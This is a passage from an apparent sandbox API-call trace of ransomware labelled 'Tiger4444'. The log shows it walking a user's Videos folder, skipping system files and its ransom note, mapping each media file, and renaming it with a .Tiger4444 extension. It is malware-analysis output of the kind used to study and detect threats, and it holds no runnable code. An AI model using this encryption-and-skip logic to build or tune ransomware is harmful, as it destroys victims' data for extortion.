lpString2="ccn85Ai_.mp4" | out: lpString1="ccn85Ai_.mp4") returned="ccn85Ai_.mp4" [0045.116] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ccn85Ai_.mp4", dwFileAttributes=0x0) returned 1 [0045.116] lstrlenW (lpString="ccn85Ai_.mp4") returned 12 [0045.116] lstrlenW (lpString="Tiger4444") returned 9 [0045.117] lstrcmpiW (lpString1="85Ai_.mp4", lpString2="Tiger4444") returned -1 [0045.117] lstrlenW (lpString=".dll") returned 4 [0045.117] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0045.117] lstrlenW (lpString=".lnk") returned 4 [0045.117] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0045.117] lstrlenW (lpString=".ini") returned 4 [0045.117] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0045.117] lstrlenW (lpString=".sys") returned 4 [0045.117] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0045.117] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ccn85Ai_.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\ccn85ai_.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.117] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.117] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13657005030) returned 1 [0045.117] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=82242) returned 1 [0045.117] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0045.117] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71950 [0045.117] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x14450, lpName=0x0) returned 0x2c8 [0045.117] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x14450) returned 0xbe0000 [0045.119] CryptAcquireContextW (in: phProv=0x30abb40, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30abb40*=0xc720c0) returned 1 [0045.119] CryptGenRandom (in: hProv=0xc720c0, dwLen=0x80, pbBuffer=0x30abb5c | out: pbBuffer=0x30abb5c) returned 1 [0045.119] CryptReleaseContext (hProv=0xc720c0, dwFlags=0x0) returned 1 [0045.119] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.119] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.119] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.120] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0045.120] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.120] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0045.120] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.120] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.120] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13657298727) returned 1 [0045.120] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0045.120] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71950 | out: hHeap=0xc50000) returned 1 [0045.120] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.121] CloseHandle (hObject=0x2c8) returned 1 [0045.121] CloseHandle (hObject=0x260) returned 1 [0045.123] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\ccn85Ai_.mp4.Tiger4444") returned 45 [0045.123] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\ccn85Ai_.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\ccn85ai_.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\ccn85Ai_.mp4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\ccn85ai_.mp4.tiger4444"), dwFlags=0x1) returned 1 [0045.124] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=82256 | out: Addend=0xc6f980) returned 15282768 [0045.124] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4410 [0045.124] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x43f94523, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x43f94523, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce317778, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0045.124] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.124] lstrcmpiW (lpString1="desktop.ini", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.124] lstrcmpiW (lpString1="desktop.ini", lpString2="Tiger4444.exe") returned -1 [0045.124] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0045.124] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0045.124] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0045.124] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0045.124] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0045.124] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0045.124] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0045.124] lstrcmpiW (lpString1="desktop.ini", lpString2="NTUSER.DAT") returned -1 [0045.124] lstrcpyW (in: lpString1=0x30aead6, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0045.124] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini", dwFileAttributes=0x22) returned 1 [0045.124] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\desktop.ini", dwFileAttributes=0x6) returned 1 [0045.125] lstrlenW (lpString="desktop.ini") returned 11 [0045.125] lstrlenW (lpString="Tiger4444") returned 9 [0045.125] lstrcmpiW (lpString1="sktop.ini", lpString2="Tiger4444") returned -1 [0045.125] lstrlenW (lpString=".dll") returned 4 [0045.125] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0045.125] lstrlenW (lpString=".lnk") returned 4 [0045.125] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0045.125] lstrlenW (lpString=".ini") returned 4 [0045.125] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0045.125] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ccfb920, ftCreationTime.dwHighDateTime=0x1d4c6b9, ftLastAccessTime.dwLowDateTime=0x148cbd00, ftLastAccessTime.dwHighDateTime=0x1d4d410, ftLastWriteTime.dwLowDateTime=0x148cbd00, ftLastWriteTime.dwHighDateTime=0x1d4d410, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J4la1r gmDnAcszsLl", cAlternateFileName="J4LA1R~1")) returned 1 [0045.125] lstrcmpiW (lpString1="J4la1r gmDnAcszsLl", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.125] lstrcmpiW (lpString1="J4la1r gmDnAcszsLl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.125] lstrcmpiW (lpString1="J4la1r gmDnAcszsLl", lpString2="Tiger4444.exe") returned -1 [0045.125] lstrcmpiW (lpString1="J4la1r gmDnAcszsLl", lpString2=".") returned 1 [0045.125] lstrcmpiW (lpString1="J4la1r gmDnAcszsLl", lpString2="..") returned 1 [0045.125] lstrcmpiW (lpString1="J4la1r gmDnAcszsLl", lpString2="windows") returned -1 [0045.125] lstrcmpiW (lpString1="J4la1r gmDnAcszsLl", lpString2="bootmgr") returned 1 [0045.125] lstrcmpiW (lpString1="J4la1r gmDnAcszsLl", lpString2="pagefile.sys") returned -1 [0045.125] lstrcmpiW (lpString1="J4la1r gmDnAcszsLl", lpString2="boot") returned 1 [0045.125] lstrcmpiW (lpString1="J4la1r gmDnAcszsLl", lpString2="ids.txt") returned 1 [0045.125] lstrcmpiW (lpString1="J4la1r gmDnAcszsLl", lpString2="NTUSER.DAT") returned -1 [0045.125] lstrcpyW (in: lpString1=0x30aead6, lpString2="J4la1r gmDnAcszsLl" | out: lpString1="J4la1r gmDnAcszsLl") returned="J4la1r gmDnAcszsLl" [0045.125] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66620 [0045.125] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x54) returned 0xc765e8 [0045.125] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66628 | out: ListHead=0xc66828, ListEntry=0xc66628) returned 0xc66608 [0045.125] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc933e760, ftCreationTime.dwHighDateTime=0x1d4ca0b, ftLastAccessTime.dwLowDateTime=0xc9dd9ad0, ftLastAccessTime.dwHighDateTime=0x1d4cf6f, ftLastWriteTime.dwLowDateTime=0xc9dd9ad0, ftLastWriteTime.dwHighDateTime=0x1d4cf6f, nFileSizeHigh=0x0, nFileSizeLow=0x67af, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nZxJYVmIXHGhm.flv", cAlternateFileName="NZXJYV~1.FLV")) returned 1 [0045.125] lstrcmpiW (lpString1="nZxJYVmIXHGhm.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.125] lstrcmpiW (lpString1="nZxJYVmIXHGhm.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.125] lstrcmpiW (lpString1="nZxJYVmIXHGhm.flv", lpString2="Tiger4444.exe") returned -1 [0045.125] lstrcmpiW (lpString1="nZxJYVmIXHGhm.flv", lpString2=".") returned 1 [0045.125] lstrcmpiW (lpString1="nZxJYVmIXHGhm.flv", lpString2="..") returned 1 [0045.125] lstrcmpiW (lpString1="nZxJYVmIXHGhm.flv", lpString2="windows") returned -1 [0045.125] lstrcmpiW (lpString1="nZxJYVmIXHGhm.flv", lpString2="bootmgr") returned 1 [0045.126] lstrcmpiW (lpString1="nZxJYVmIXHGhm.flv", lpString2="pagefile.sys") returned -1 [0045.126] lstrcmpiW (lpString1="nZxJYVmIXHGhm.flv", lpString2="boot") returned 1 [0045.126] lstrcmpiW (lpString1="nZxJYVmIXHGhm.flv", lpString2="ids.txt") returned 1 [0045.126] lstrcmpiW (lpString1="nZxJYVmIXHGhm.flv", lpString2="NTUSER.DAT") returned 1 [0045.126] lstrcpyW (in: lpString1=0x30aead6, lpString2="nZxJYVmIXHGhm.flv" | out: lpString1="nZxJYVmIXHGhm.flv") returned="nZxJYVmIXHGhm.flv" [0045.126] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\nZxJYVmIXHGhm.flv", dwFileAttributes=0x0) returned 1 [0045.126] lstrlenW (lpString="nZxJYVmIXHGhm.flv") returned 17 [0045.126] lstrlenW (lpString="Tiger4444") returned 9 [0045.126] lstrcmpiW (lpString1="XHGhm.flv", lpString2="Tiger4444") returned 1 [0045.126] lstrlenW (lpString=".dll") returned 4 [0045.126] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0045.126] lstrlenW (lpString=".lnk") returned 4 [0045.126] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0045.126] lstrlenW (lpString=".ini") returned 4 [0045.126] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0045.126] lstrlenW (lpString=".sys") returned 4 [0045.126] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0045.126] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\nZxJYVmIXHGhm.flv" (normalized: "c:\\users\\fd1hvy\\videos\\nzxjyvmixhghm.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.126] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.126] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13657939786) returned 1 [0045.126] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=26543) returned 1 [0045.126] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0045.126] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0045.126] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6ab0, lpName=0x0) returned 0x2c8 [0045.127] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6ab0) returned 0xbe0000 [0045.127] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.127] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0045.127] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.127] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0045.127] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0045.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0045.128] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13658087794) returned 1 [0045.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0045.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0045.128] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.128] CloseHandle (hObject=0x2c8) returned 1 [0045.128] CloseHandle (hObject=0x260) returned 1 [0045.130] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\nZxJYVmIXHGhm.flv.Tiger4444") returned 50 [0045.130] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\nZxJYVmIXHGhm.flv" (normalized: "c:\\users\\fd1hvy\\videos\\nzxjyvmixhghm.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\nZxJYVmIXHGhm.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\nzxjyvmixhghm.flv.tiger4444"), dwFlags=0x1) returned 1 [0045.130] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=26544 | out: Addend=0xc6f980) returned 15365024 [0045.130] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4412 [0045.130] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1f50d50, ftCreationTime.dwHighDateTime=0x1d4cdc9, ftLastAccessTime.dwLowDateTime=0x4a4d74e0, ftLastAccessTime.dwHighDateTime=0x1d4c8ab, ftLastWriteTime.dwLowDateTime=0x4a4d74e0, ftLastWriteTime.dwHighDateTime=0x1d4c8ab, nFileSizeHigh=0x0, nFileSizeLow=0x593f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ofQy-RjpJsOl2h.avi", cAlternateFileName="OFQY-R~1.AVI")) returned 1 [0045.130] lstrcmpiW (lpString1="ofQy-RjpJsOl2h.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.130] lstrcmpiW (lpString1="ofQy-RjpJsOl2h.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.130] lstrcmpiW (lpString1="ofQy-RjpJsOl2h.avi", lpString2="Tiger4444.exe") returned -1 [0045.130] lstrcmpiW (lpString1="ofQy-RjpJsOl2h.avi", lpString2=".") returned 1 [0045.131] lstrcmpiW (lpString1="ofQy-RjpJsOl2h.avi", lpString2="..") returned 1 [0045.131] lstrcmpiW (lpString1="ofQy-RjpJsOl2h.avi", lpString2="windows") returned -1 [0045.131] lstrcmpiW (lpString1="ofQy-RjpJsOl2h.avi", lpString2="bootmgr") returned 1 [0045.131] lstrcmpiW (lpString1="ofQy-RjpJsOl2h.avi", lpString2="pagefile.sys") returned -1 [0045.131] lstrcmpiW (lpString1="ofQy-RjpJsOl2h.avi", lpString2="boot") returned 1 [0045.131] lstrcmpiW (lpString1="ofQy-RjpJsOl2h.avi", lpString2="ids.txt") returned 1 [0045.131] lstrcmpiW (lpString1="ofQy-RjpJsOl2h.avi", lpString2="NTUSER.DAT") returned 1 [0045.131] lstrcpyW (in: lpString1=0x30aead6, lpString2="ofQy-RjpJsOl2h.avi" | out: lpString1="ofQy-RjpJsOl2h.avi") returned="ofQy-RjpJsOl2h.avi" [0045.131] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ofQy-RjpJsOl2h.avi", dwFileAttributes=0x0) returned 1 [0045.131] lstrlenW (lpString="ofQy-RjpJsOl2h.avi") returned 18 [0045.131] lstrlenW (lpString="Tiger4444") returned 9 [0045.131] lstrcmpiW (lpString1="sOl2h.avi", lpString2="Tiger4444") returned -1 [0045.131] lstrlenW (lpString=".dll") returned 4 [0045.131] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0045.131] lstrlenW (lpString=".lnk") returned 4 [0045.131] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0045.131] lstrlenW (lpString=".ini") returned 4 [0045.131] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0045.131] lstrlenW (lpString=".sys") returned 4 [0045.131] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0045.131] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\ofQy-RjpJsOl2h.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ofqy-rjpjsol2h.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.131] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.131] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13658446743) returned 1 [0045.131] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=22847) returned 1 [0045.131] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0045.131] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ea0 [0045.132] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5c40, lpName=0x0) returned 0x2c8 [0045.132] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5c40) returned 0xbe0000 [0045.132] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.132] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0045.132] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.132] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0045.132] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.133] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0045.133] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.133] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0045.133] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13658574715) returned 1 [0045.133] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0045.133] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ea0 | out: hHeap=0xc50000) returned 1 [0045.133] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.133] CloseHandle (hObject=0x2c8) returned 1 [0045.133] CloseHandle (hObject=0x260) returned 1 [0045.135] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\ofQy-RjpJsOl2h.avi.Tiger4444") returned 51 [0045.135] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\ofQy-RjpJsOl2h.avi" (normalized: "c:\\users\\fd1hvy\\videos\\ofqy-rjpjsol2h.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\ofQy-RjpJsOl2h.avi.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\ofqy-rjpjsol2h.avi.tiger4444"), dwFlags=0x1) returned 1 [0045.135] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=22848 | out: Addend=0xc6f980) returned 15391568 [0045.135] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4413 [0045.135] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8f551f0, ftCreationTime.dwHighDateTime=0x1d4ca24, ftLastAccessTime.dwLowDateTime=0x96a8f330, ftLastAccessTime.dwHighDateTime=0x1d4ce2a, ftLastWriteTime.dwLowDateTime=0x96a8f330, ftLastWriteTime.dwHighDateTime=0x1d4ce2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PdDH9giHo14Og6", cAlternateFileName="PDDH9G~1")) returned 1 [0045.135] lstrcmpiW (lpString1="PdDH9giHo14Og6", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.136] lstrcmpiW (lpString1="PdDH9giHo14Og6", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.138] lstrcmpiW (lpString1="PdDH9giHo14Og6", lpString2="Tiger4444.exe") returned -1 [0045.138] lstrcmpiW (lpString1="PdDH9giHo14Og6", lpString2=".") returned 1 [0045.138] lstrcmpiW (lpString1="PdDH9giHo14Og6", lpString2="..") returned 1 [0045.138] lstrcmpiW (lpString1="PdDH9giHo14Og6", lpString2="windows") returned -1 [0045.138] lstrcmpiW (lpString1="PdDH9giHo14Og6", lpString2="bootmgr") returned 1 [0045.138] lstrcmpiW (lpString1="PdDH9giHo14Og6", lpString2="pagefile.sys") returned 1 [0045.138] lstrcmpiW (lpString1="PdDH9giHo14Og6", lpString2="boot") returned 1 [0045.138] lstrcmpiW (lpString1="PdDH9giHo14Og6", lpString2="ids.txt") returned 1 [0045.138] lstrcmpiW (lpString1="PdDH9giHo14Og6", lpString2="NTUSER.DAT") returned 1 [0045.138] lstrcpyW (in: lpString1=0x30aead6, lpString2="PdDH9giHo14Og6" | out: lpString1="PdDH9giHo14Og6") returned="PdDH9giHo14Og6" [0045.138] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66660 [0045.138] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x4c) returned 0xc73980 [0045.138] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66668 | out: ListHead=0xc66828, ListEntry=0xc66668) returned 0xc66628 [0045.138] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6334580, ftCreationTime.dwHighDateTime=0x1d4d0aa, ftLastAccessTime.dwLowDateTime=0x4b9ea9f0, ftLastAccessTime.dwHighDateTime=0x1d4ce72, ftLastWriteTime.dwLowDateTime=0x4b9ea9f0, ftLastWriteTime.dwHighDateTime=0x1d4ce72, nFileSizeHigh=0x0, nFileSizeLow=0x184f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="s9NfPDdsE6nhezSDza.flv", cAlternateFileName="S9NFPD~1.FLV")) returned 1 [0045.138] lstrcmpiW (lpString1="s9NfPDdsE6nhezSDza.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.138] lstrcmpiW (lpString1="s9NfPDdsE6nhezSDza.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.138] lstrcmpiW (lpString1="s9NfPDdsE6nhezSDza.flv", lpString2="Tiger4444.exe") returned -1 [0045.138] lstrcmpiW (lpString1="s9NfPDdsE6nhezSDza.flv", lpString2=".") returned 1 [0045.138] lstrcmpiW (lpString1="s9NfPDdsE6nhezSDza.flv", lpString2="..") returned 1 [0045.139] lstrcmpiW (lpString1="s9NfPDdsE6nhezSDza.flv", lpString2="windows") returned -1 [0045.139] lstrcmpiW (lpString1="s9NfPDdsE6nhezSDza.flv", lpString2="bootmgr") returned 1 [0045.139] lstrcmpiW (lpString1="s9NfPDdsE6nhezSDza.flv", lpString2="pagefile.sys") returned 1 [0045.139] lstrcmpiW (lpString1="s9NfPDdsE6nhezSDza.flv", lpString2="boot") returned 1 [0045.139] lstrcmpiW (lpString1="s9NfPDdsE6nhezSDza.flv", lpString2="ids.txt") returned 1 [0045.139] lstrcmpiW (lpString1="s9NfPDdsE6nhezSDza.flv", lpString2="NTUSER.DAT") returned 1 [0045.139] lstrcpyW (in: lpString1=0x30aead6, lpString2="s9NfPDdsE6nhezSDza.flv" | out: lpString1="s9NfPDdsE6nhezSDza.flv") returned="s9NfPDdsE6nhezSDza.flv" [0045.139] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\s9NfPDdsE6nhezSDza.flv", dwFileAttributes=0x0) returned 1 [0045.139] lstrlenW (lpString="s9NfPDdsE6nhezSDza.flv") returned 22 [0045.139] lstrlenW (lpString="Tiger4444") returned 9 [0045.139] lstrcmpiW (lpString1="zSDza.flv", lpString2="Tiger4444") returned 1 [0045.139] lstrlenW (lpString=".dll") returned 4 [0045.139] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0045.139] lstrlenW (lpString=".lnk") returned 4 [0045.139] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0045.139] lstrlenW (lpString=".ini") returned 4 [0045.139] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0045.139] lstrlenW (lpString=".sys") returned 4 [0045.139] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0045.139] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\s9NfPDdsE6nhezSDza.flv" (normalized: "c:\\users\\fd1hvy\\videos\\s9nfpddse6nhezsdza.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.139] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.139] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13659257526) returned 1 [0045.140] 